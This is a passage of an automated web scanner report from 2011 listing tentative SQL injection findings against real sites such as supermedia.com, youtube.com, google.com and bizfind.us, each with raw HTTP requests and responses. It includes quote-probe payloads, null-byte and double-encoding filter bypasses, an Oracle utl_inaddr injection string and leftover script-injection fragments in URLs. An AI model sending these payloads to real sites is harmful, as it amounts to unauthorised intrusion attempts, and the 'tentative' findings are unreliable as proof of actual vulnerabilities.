<title>ABC DEVELOPMENT INC - CHICAGO/X22/"NS="ALERT(0X0006C1)</title>
...[SNIP]...

Request 2

GET /15/182221''/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response 2

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:01:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11730
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=MJMOGJOBEPNDDLCHJDPLEIAF; path=/
Cache-control: private

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22/"NS="ALERT(0X0006C1)</title>
...[SNIP]...

1.14. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bizfind.us
Path:	/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)

Issue detail

Request 1

GET /15/182221/abc-development-inc/chicago.aspx/x22'/%22ns=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response 1

HTTP/1.1 500 Internal Server Error
Date: Fri, 04 Feb 2011 18:01:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 1495
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=BNMOGJOBONCKHCHLACPLEBGD; path=/
Cache-control: private

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22'/"NS="ALERT(0X0006C1)</title
...[SNIP]...

Request 2

GET /15/182221/abc-development-inc/chicago.aspx/x22''/%22ns=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response 2

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:01:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11750
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=JNMOGJOBBHGDIKEGFOMAOLDA; path=/
Cache-control: private

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22''/"NS="ALERT(0X0006C1)</titl
...[SNIP]...

1.15. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bizfind.us
Path:	/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns'=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response 1

HTTP/1.1 500 Internal Server Error
Date: Fri, 04 Feb 2011 18:01:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 1495
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=DPMOGJOBNNLPMDCLNBMEICJC; path=/
Cache-control: private

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22/"NS'="ALERT(0X0006C1)</title
...[SNIP]...

Request 2

GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns''=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response 2

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:01:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11750
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=KPMOGJOBMLCCEDABHNCMIGKC; path=/
Cache-control: private

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22/"NS''="ALERT(0X0006C1)</titl
...[SNIP]...

1.16. http://www.google.com/prdhp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.google.com
Path:	/prdhp

Issue detail

Request 1

GET /prdhp' HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 03 Feb 2011 21:51:11 GMT
Server: sffe
Content-Length: 1364
X-XSS-Protection: 1; mode=block
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>404 Not Found</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A {fon
...[SNIP]...
<b>Error</b>
...[SNIP]...

Request 2

GET /prdhp'' HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response 2

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: http://sorry.google.com/sorry/?continue=http://www.google.com/prdhp%27%27
Content-Length: 270
Date: Thu, 03 Feb 2011 21:51:14 GMT
Server: GFE/2.0
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://sorry.google.com/sorry/?c
...[SNIP]...

1.17. http://www.supermedia.com/support/contact-us/ [CstrStatus cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.supermedia.com
Path:	/support/contact-us/

Issue detail

The CstrStatus cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CstrStatus cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /support/contact-us/ HTTP/1.1
Host: www.supermedia.com
Proxy-Connection: keep-alive
Referer: http://ir.supermedia.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U%00'; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296762069|check#true#1296760269; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:18:43 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 24645

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Contact SuperMedia | SuperMedia.com Advertising</title>

...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="Unable to extract the flow definition id parameter: make sure the client provides the '_flowId' parameter as input or set the 'defaultFlowId' property; the parameters provided in this reque
...[SNIP]...

Request 2

GET /support/contact-us/ HTTP/1.1
Host: www.supermedia.com
Proxy-Connection: keep-alive
Referer: http://ir.supermedia.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U%00''; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296762069|check#true#1296760269; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:18:44 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 24302

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Contact SuperMedia | SuperMedia.com Advertising</title>

...[SNIP]...

1.18. https://www.supermedia.com/spportal/indexLogin.do [s_cc cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.supermedia.com
Path:	/spportal/indexLogin.do

Issue detail

The s_cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /spportal/indexLogin.do HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true'; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:29:58 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>

...[SNIP]...
referrer="http://www.google.com/search?hl=en&q=f82520213c151ae1ef1e25df";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="Badly formatted flow execution key '.80070</script>
...[SNIP]...

Request 2

GET /spportal/indexLogin.do HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true''; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response 2 (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:04 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>

...[SNIP]...

1.19. https://www.supermedia.com/spportal/spportalFlow.do [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.supermedia.com
Path:	/spportal/spportalFlow.do

Issue detail

Request 1

GET /spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27&1'=1 HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761732|check#true#1296759932; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:20:05 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 20261

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>



<title>SuperPages
...[SNIP]...
e next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="Unable to extract the flow definition id parameter: make sure the client provides the '_flowId' parameter as input or set the 'defaultFlowId' property; the parameters provided in this reque
...[SNIP]...

Request 2

GET /spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27&1''=1 HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761732|check#true#1296759932; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:20:17 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 19960

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>



<title>SuperPages
...[SNIP]...

1.20. https://www.supermedia.com/spportal/spportalFlow.do(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C' [s_sq cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.supermedia.com
Path:	/spportal/spportalFlow.do(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C'

Issue detail

The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the s_sq cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /spportal/spportalFlow.do(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C' HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761701|check#true#1296759901; s_cc=true; s_sq=%5B%5BB%5D%5D%2527; undefined_s=First%20Visit

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:06:31 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 21158

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>

...[SNIP]...
e next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="Badly formatted flow execution key ''||(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL
...[SNIP]...

Request 2

Response 2 (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:06:32 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20820

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>

...[SNIP]...

1.21. http://www.youtube.com/ [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.youtube.com
Path:	/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET / HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:31:01 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=Lw2qL_Rbihs; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 20:31:01 GMT
Set-Cookie: GEO=66cfdf9c9df4e3b550a4e342d19a849ccwsAAAAzVVOtwdbzTUsQhQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >

<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...
<img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Making Out FAIL" data-thumb="//i2.ytimg.com/vi/msJrcliQP8s/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/23');" >
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:31:01 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=x1-FJdMfy6I; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 20:31:01 GMT
Set-Cookie: GEO=66cfdf9c9df4e3b550a4e342d19a849ccwsAAAAzVVOtwdbzTUsQhQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >

<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...

1.22. http://www.youtube.com/ [hl parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.youtube.com
Path:	/

Issue detail

The hl parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the hl parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /?hl=en%00'&tab=w1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;

Response 1

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:47:56 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: PREF=f1=50000000; path=/; domain=.youtube.com; expires=Sun, 31-Jan-2021 21:47:56 GMT
Set-Cookie: GEO=1511cab9604e8f09758fe0408381df3bcwsAAAAzVVOtwdbzTUsijA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >

<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...
<img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Making Out FAIL" data-thumb="//i2.ytimg.com/vi/msJrcliQP8s/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/23');" >
...[SNIP]...

Request 2

GET /?hl=en%00''&tab=w1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;

Response 2

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:47:56 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: PREF=f1=50000000; path=/; domain=.youtube.com; expires=Sun, 31-Jan-2021 21:47:56 GMT
Set-Cookie: GEO=1511cab9604e8f09758fe0408381df3bcwsAAAAzVVOtwdbzTUsijA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >

<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...

1.23. http://www.youtube.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.youtube.com
Path:	/

Issue detail

Request 1

GET /?1'=1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:30:59 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=ToX6xrflukg; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 20:30:59 GMT
Set-Cookie: GEO=cd292126a2309f40972ca5321f4112a7cwsAAAAzVVOtwdbzTUsQgw==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >

<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...
<img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Making Out FAIL" data-thumb="//i2.ytimg.com/vi/msJrcliQP8s/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/23');" >
...[SNIP]...

Request 2

GET /?1''=1 HTTP/1.1
Host: www.youtube.com
